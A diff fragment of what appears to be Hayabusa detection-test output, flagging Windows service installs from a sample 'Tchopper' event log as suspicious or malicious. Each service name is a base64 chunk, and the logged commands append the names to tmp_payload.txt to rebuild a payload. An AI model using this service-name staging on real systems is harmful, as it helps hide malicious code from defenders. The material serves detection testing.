+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
